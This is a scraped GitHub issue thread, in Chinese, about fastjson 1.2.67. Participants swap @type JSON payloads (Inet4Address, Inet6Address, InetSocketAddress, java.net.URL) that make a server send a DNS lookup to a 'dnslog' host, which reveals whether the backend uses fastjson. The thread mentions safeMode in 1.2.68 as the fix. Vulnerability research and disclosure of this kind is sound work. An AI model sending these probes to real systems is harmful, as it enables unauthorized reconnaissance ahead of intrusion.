3
java.net.InetAddress虽然被禁止了,但是依然可以使用如下两个payload探测后端是否是fastjson
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}Q
[alibaba/fastjson]发现最新版本1.2.67依然可以通过dnslog判断后端是否使用fastjson
A
回答
9
而且无需开启autotype
4
java.net.InetAddress虽然被禁止了,但是依然可以使用如下两个payload探测后端是否是fastjson{"@type":"java.net.Inet4Address","val":"dnslog"} {"@type":"java.net.Inet6Address","val":"dnslog"}
nice work, thx!
3
我再发一个畸形的
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
6
@retanoj nb,下午也刚好和其他师傅聊到这个payload
4
新知识get
5
还有很早的那个ysoserial里的由HashMap触发的URLDNS也能用,只不过也有点畸形
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}然而都没啥卵用啊,只能发个dns
4
学习了
9
不造你为啥要变那么畸形
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
6
看样子,最新的bypass也快出来了:)
8
@threedr3am 赞,再短点
Set[{"@type":"java.net.URL","val":"dnslog"}]再短
Set[{"@type":"java.net.URL","val":"dnslog"}再
{{"@type":"java.net.URL","val":"dnslog"}:0
4
amazing :-)
3
tql
8
能获取到啥敏感信息吗
0
https://github.com/alibaba/fastjson/releases/tag/1.2.68 1.2.68版本提供了safeMode配置,可以完全禁用autoType,包括白名单和黑名单。
4
@retanoj 师傅,以上畸形的payload只能探测到存在fastjson是么?实际利用有什么思路么?
4
@retanoj 师傅,以上畸形的payload只能探测到存在fastjson是么?实际利用有什么思路么?
java.net.Inet4Address 这个payload只能发dns,没有利用方法了吧